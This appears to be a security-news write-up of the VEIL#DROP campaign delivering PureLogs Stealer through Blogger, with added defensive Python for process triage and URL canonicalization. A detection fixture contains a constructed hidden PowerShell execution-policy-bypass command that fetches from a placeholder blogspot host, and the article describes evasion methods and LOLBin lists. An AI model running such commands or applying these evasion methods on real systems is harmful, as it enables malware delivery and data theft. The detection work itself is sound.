VEIL#DROP: New Multi-Stage Malware Leverages Blogger for Stealthy PureLogs Stealer Delivery
Cybersecurity researchers at **Securonix** have uncovered a sophisticated multi-stage malware delivery campaign dubbed **VEIL#DROP**. This new attack chain exploits social engineering and legitimate **Blogger** pages to deploy **PureLogs Stealer**, a potent information-gathering malware, by blending malicious activity with trusted infrastructure.
A new and highly evasive malware delivery attack chain, **VEIL#DROP**, has been identified by **Securonix**. This campaign leverages social engineering and **Google**'s trusted **Blogger** platform to deliver **PureLogs Stealer**, a .NET-based information stealer.
### Initial Compromise and Evasion Tactics
The infection typically begins with spear-phishing or a drive-by compromise, where users are tricked into executing a deceptively named JavaScript file, such as `transcript.pdf.js`. This file, executed via **Windows Script Host**, launches **PowerShell** with execution policy bypasses enabled.
According to **Akshay Gaikwad**, **Shikha Sangwan**, and **Aaron Beardslee** of **Securonix**, the PowerShell script then retrieves a subsequent payload hosted on a **Blogger** domain (e.g., `htlwub00klocate.blogspot[.]com`). This tactic allows attackers to bypass reputation-based defenses by abusing **Google**'s infrastructure as a staging ground, making the malicious traffic appear legitimate.
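The execution chain described above (a double-extension `.js` run by Windows Script Host, which then starts PowerShell with an execution-policy bypass, and, for the fallback described later in the article, PowerShell starting one of the signed .NET binaries) is visible in ordinary process-creation telemetry. The following Python triage is an added example and is not code from Securonix or from this article; it runs over constructed Sysmon-style events embedded inline, and the hostname, paths and PIDs in it are made up. Each finding is returned from `triage()` so the result can be checked rather than only printed.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation events (Sysmon Event ID 1-style fields). Not real telemetry;
# the blogspot host, user name and temp path are placeholders invented for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "1001", "ppid": "400", "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": "1002", "ppid": "1001", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\transcript.pdf.js"'},
    {"pid": "1003", "ppid": "1002",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -NoProfile -w hidden "
                "-c iwr https://stage-example.blogspot.com/"},
    {"pid": "1004", "ppid": "1003",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
     "cmdline": r"regsvcs.exe C:\Users\alice\AppData\Local\Temp\stage.dll"},
    # Benign control: PowerShell started by explorer.exe without a policy bypass.
    {"pid": "1005", "ppid": "1001",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Signed .NET binaries the article names as the loader's fallback executors.
DOTNET_LOLBINS = {"regsvcs.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}
# "-ExecutionPolicy Bypass", "-ep bypass", "-exec bypass" (case-insensitive).
POLICY_BYPASS = re.compile(r"-(?:ep|exec(?:utionpolicy)?)\s+bypass", re.IGNORECASE)
# A document-looking extension immediately followed by a script-host extension.
DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|txt|jpe?g|png)\.(?:js|jse|vbs|vbe|wsf|hta)$",
                        re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def has_double_extension(cmdline: str) -> bool:
    """True if any (quoted or bare) argument looks like document.<ext>.<script-ext>."""
    for quoted, bare in re.findall(r'"([^"]+)"|(\S+)', cmdline):
        if DOUBLE_EXT.search(quoted or bare):
            return True
    return False


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (pid, reason) for every event matching one link of the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings: List[Tuple[str, str]] = []
    for e in events:
        image = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_image = basename(parent["image"]) if parent else ""
        if image in SCRIPT_HOSTS and has_double_extension(e["cmdline"]):
            findings.append((e["pid"], "script host running a double-extension script"))
        elif (image == "powershell.exe" and parent_image in SCRIPT_HOSTS
              and POLICY_BYPASS.search(e["cmdline"])):
            findings.append((e["pid"], "PowerShell with execution-policy bypass spawned by script host"))
        elif image in DOTNET_LOLBINS and parent_image == "powershell.exe":
            findings.append((e["pid"], f"{image} spawned by PowerShell"))
    return findings


if __name__ == "__main__":
    for pid, reason in triage(SAMPLE_EVENTS):
        print(pid, reason)
```

The parent-child conditions matter more than any single string: PowerShell with a bypass flag is common in administration, but PowerShell with a bypass flag whose parent is `wscript.exe`, followed by a signed .NET utility whose parent is that PowerShell, is the shape this article describes and is rare in legitimate use.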
### The Role of PureLogs Stealer
The downloaded PowerShell payload initially displays a benign web page, such as **Google**, creating the illusion that a PDF document is opening. Simultaneously, the infection proceeds silently in the background, culminating in the deployment of **PureLogs Stealer**. This infostealer, also known as **PureLog**, is offered under a malware-as-a-service (MaaS) model by the threat actor **PureCoder** and is designed to harvest a wide array of sensitive data from compromised systems.
### Advanced Evasion and Persistence
**VEIL#DROP** exhibits several advanced evasion techniques:
* **Process Termination and Evidence Deletion**: The PowerShell loader attempts to terminate processes like `wscript.exe` and deletes `transcript.pdf.js` to minimize forensic traces.
* **Dynamic Stage Generation**: The malware constructs unique **blogspot[.]com** URLs for each execution by inserting a random number of forward slashes. This bypasses static URL signatures and indicator-based blocking.
* **Runtime Mutation and Polymorphism**: The decoded script introduces runtime mutation by replacing placeholder values with randomly generated strings, defeating script signatures and file hashes.
* **Fileless Execution**: The reconstructed script is executed entirely in memory, leaving no artifacts on disk. This involves reflective code loading of a .NET assembly.
* **Living-Off-The-Land (LotL) Binaries**: If direct memory execution fails, the loader leverages trusted **Microsoft**-signed binaries such as `regsvcs.exe`, `installutil.exe`, `msbuild.exe`, and `aspnet_compiler.exe`. This cascade model ensures execution without raising suspicion, as these binaries are legitimate and present on most systems.
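The slash-padding described under Dynamic Stage Generation only defeats indicator matching that compares raw strings. Canonicalizing a URL before comparison (lower-casing scheme and host, dropping a default port, collapsing runs of `/` in the path) makes the padded variants collapse onto one value. The block below is an added example and is not from Securonix or this article; the blogspot host in it is a constructed placeholder, and the refanging step exists because indicators are commonly published in the `hxxps://host[.]com` form used in this article.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed indicator for demonstration; the campaign's real staging host is not reproduced here.
BLOCKED_HOSTS = {"stage-example.blogspot.com"}

DEFAULT_PORTS = {"http": 80, "https": 443}


def refang(url: str) -> str:
    """Turn a defanged indicator (hxxps://host[.]tld) back into a parseable URL."""
    return url.strip().replace("[.]", ".").replace("hxxp", "http")


def canonicalize(url: str) -> str:
    """Canonical form of a URL so that slash-padded variants compare equal."""
    parts = urlsplit(refang(url))
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    # Keep an explicit port only if it is not the scheme's default.
    if parts.port and parts.port != DEFAULT_PORTS.get(scheme):
        host = f"{host}:{parts.port}"
    # Collapse any run of slashes in the path; an empty path becomes "/".
    path = re.sub(r"/{2,}", "/", parts.path) or "/"
    # The fragment never reaches the server, so it is dropped from the canonical form.
    return urlunsplit((scheme, host, path, parts.query, ""))


def matches_indicator(observed_url: str, indicator_url: str) -> bool:
    """Compare an observed URL against a published indicator after canonicalizing both."""
    return canonicalize(observed_url) == canonicalize(indicator_url)


def is_blocked_host(observed_url: str) -> bool:
    """Host-level check, which is robust to any path padding at all."""
    return urlsplit(canonicalize(observed_url)).hostname in BLOCKED_HOSTS


if __name__ == "__main__":
    padded = "HTTPS://Stage-Example.blogspot.com:443////2024///05//post.html"
    print(canonicalize(padded))
    print(matches_indicator(padded, "hxxps://stage-example.blogspot[.]com/2024/05/post.html"))
    print(is_blocked_host(padded))
```

Because the padding varies per execution while the host does not, blocking or alerting at the host level (or on the canonicalized path) holds up where a raw-string match on the full URL does not; the same canonicalization should be applied to the indicator side, since published IoCs are often defanged or written with mixed case.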

### Broader Implications
The impact of a stealer infection extends beyond the initial endpoint. Harvested data can be used for deeper network penetration, lateral movement, establishing persistence, and even breaching cloud infrastructure.
**Securonix** emphasizes that the combination of compromised websites, multi-extension masquerading, trusted cloud services, XOR-obfuscated payloads, reflective .NET loading, fileless execution, and **LOLBIN** (Living Off The Land Binaries) abuse demonstrates a deliberate effort to evade traditional antivirus solutions, minimize forensic artifacts, and maintain operational stealth throughout the infection lifecycle. This sophisticated approach highlights the evolving threat landscape and the need for robust, multi-layered security defenses.